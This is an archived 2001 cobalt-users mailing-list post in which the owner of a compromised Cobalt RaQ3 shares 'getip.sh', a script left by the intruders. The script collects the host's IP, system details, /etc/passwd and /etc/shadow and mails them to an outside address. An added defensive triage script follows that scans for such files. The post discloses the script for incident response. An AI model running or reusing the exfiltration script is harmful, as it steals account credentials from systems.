[cobalt-users] Raq3 t0rn hack -- The hackers left an email address?!
- Subject: [cobalt-users] Raq3 t0rn hack -- The hackers left an email address?!
- From: Cobalt Newbie <mfahy@xxxxxxxxx>
- Date: Mon Feb 26 17:20:28 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
Ok, after much twiddling around, I found the following script named
"getip.sh" on my severely hacked box:
The most interesting thing here, I figured, is the email address to which
everything's being sent. Any security gods out there want to trace it?
For those interested, I seem to have located the install scripts, too...
Now what??
#!/bin/sh
PATH="/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin"
export PATH
route -n | while read A
do
    GW=`echo $A | awk '{printf("%s",$1)}'`
    if [ $GW = "0.0.0.0" ]
    then
        IFACE=`echo $A | awk '{printf("%s",$8)}'`
        ifconfig $IFACE | while read B
        do
            CMP=`echo $B | awk '{printf("%s",$1)}'`
            if [ $CMP = "inet" ]
            then
                MYIP=`echo $B | cut -d: -f 2 | awk '{printf("%s",$1)}'`
                # echo "my default iface is $IFACE and my ip is $MYIP"
                echo $MYIP > myip
                exit
            fi
        done
    fi
done
echo You owned this one: > mail.log
cat myip >> mail.log
echo name: >> mail.log
uname -a >> mail.log
echo network: >> mail.log
/sbin/ifconfig -a >> mail.log
echo passwd: >> mail.log
cat /etc/passwd >> mail.log
echo shadow: >> mail.log
cat /etc/shadow >> mail.log
mail -s `cat myip` 1i0nsniffer@xxxxxxxxx < mail.log
rm -rf mail.log
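
Added example, not part of the original post or of any Cobalt tooling: a triage sketch for sweeping a filesystem for files with the same traits as the script above (reads /etc/passwd or /etc/shadow and calls a mailer) and for the "myip" file it leaves behind, since it only deletes mail.log. The function names, the sample tree and the addresses in it are constructed for illustration.

```shell
#!/bin/sh
# Added triage sketch, not code from the original post.
# scan_dir DIR prints:
#   SUSPECT <path>   file reads /etc/passwd or /etc/shadow and also calls a mailer
#   ARTIFACT <path>  file named "myip" holding only an IPv4 address; the posted
#                    script deletes mail.log but never removes myip
scan_dir() {
    ip_re='^[0-9]{1,3}(\.[0-9]{1,3}){3}$'
    mail_re='(^|[^[:alnum:]_./-])(mail|mailx|sendmail)[[:space:]]'
    find "$1" -type f 2>/dev/null | while IFS= read -r f; do
        if [ "${f##*/}" = "myip" ]; then
            # at least one IPv4 line and no line that is anything else
            if grep -Eq "$ip_re" "$f" && ! grep -Evq "$ip_re" "$f"; then
                echo "ARTIFACT $f"
            fi
        elif grep -Eq '/etc/(shadow|passwd)' "$f" && grep -Eq "$mail_re" "$f"; then
            echo "SUSPECT $f"
        fi
    done
    return 0
}

# Constructed sample tree (hypothetical names and addresses) for an offline run.
make_sample() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/kit" "$d/home/admin"
    printf '%s\n' '#!/bin/sh' 'cat /etc/shadow >> mail.log' \
        'mail -s report someone@example.invalid < mail.log' > "$d/kit/getip.sh"
    printf '192.0.2.10\n' > "$d/kit/myip"
    printf '%s\n' '#!/bin/sh' 'grep -c : /etc/passwd > mail.log' > "$d/home/admin/count.sh"
    printf 'notes about my ip\n' > "$d/home/admin/myip"
    echo "$d"
}

sample=$(make_sample)
scan_dir "$sample"
rm -rf "$sample"
```

Hits are leads for manual review: a legitimate admin script that mails a report about account files will match too.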